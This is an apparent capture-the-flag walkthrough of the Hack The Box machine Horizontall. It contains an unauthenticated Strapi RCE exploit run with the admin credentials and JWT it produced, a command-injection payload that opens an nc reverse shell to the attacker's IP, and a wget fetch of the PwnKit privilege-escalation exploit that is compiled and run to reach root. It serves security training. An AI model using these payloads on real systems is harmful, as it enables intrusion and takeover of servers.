Horizontall 10.10.11.105
ttl 63

[+]NMAP[+]
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


[+]ENUMERATION[+]
curl -s -X GET http://horizontall.htb/ -o test
bat test 
<script src="/js/app.c68eb462.js"> This js is the more relevant info.

curl -s -X GET http://horizontall.htb/js/app.c68eb462.js -o app.js
bat app.js | grep htb
("http://api-prod.horizontall.htb/reviews") > New Subdomain.


http://api-prod.horizontall.htb/
/reviews
/users
/admin


http://api-prod.horizontall.htb/admin/auth/login
Username : John Doe
Password : 


http://api-prod.horizontall.htb/admin/init
{"data":{"uuid":"a55da3bd-9693-4a08-9279-f9df57fd1817","currentEnvironment":"development","autoReload":false,"strapiVersion":"3.0.0-beta.17.4"}}
strapiVersion":"3.0.0-beta.17.4 > CVE-2019-18818, CVE-2019-19609.


[+]EXPLOIT[+] > CVE-2019-18818, CVE-2019-19609
https://www.exploit-db.com/exploits/50239
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)


❯ python3 exploit.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit

[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjU0MTA0NDAwLCJleHAiOjE2NTY2OTY0MDB9.bqe_uvrY0_1ejmab4_kI6DvUT-PLiAJxrN-3_bR8p2c


[+]New Credentials
http://api-prod.horizontall.htb/admin/
Username : admin
Password : SuperStrongPassword1

[+]REVERSHELL[+]
https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
python exploit.py -d DOMAIN_OR_IP -jwt JSON_WEB_TOKEN -l LHOST -p LPORT

[+]Payload 
data = '{"plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc '+host+' '+str(port)+' >/tmp/f)", "port":"1337"}'

❯ python exploit.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjU0MTA0NDAwLCJleHAiOjE2NTY2OTY0MDB9.bqe_uvrY0_1ejmab4_kI6DvUT-PLiAJxrN-3_bR8p2c
-l 10.10.14.15 -p 4444

❯ nc -lvnp 4444


[+]USERFLAG[+]
strapi@horizontall:/home/developer$ cat user.txt
cat user.txt
a1fe246f1ea84768e5f8c0e7d6843c88


[+]PRIVILAGE ESCALATION[+] CVE-2021-4034 - Pkexec Local Privilege Escalation
linpeas.sh

- Uname -a 
Linux horizontall 4.15.0-154-generic > Vulnerable To : Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

- Useful software
/usr/bin/g++
/usr/bin/gcc
/usr/bin/pkexec

[+]PwnKit
strapi@horizontall:/dev/shm$ wget http://10.10.14.15/PwnKit.c
strapi@horizontall:/dev/shm$ chmod +x PwnKit.c
strapi@horizontall:/dev/shm$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
strapi@horizontall:/dev/shm$ ./PwnKit

root@horizontall:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root),1001(strapi)

root@horizontall:/dev/shm# cat /root/root.txt 
b9ce0abad0affbb394806fcf4c3b297d
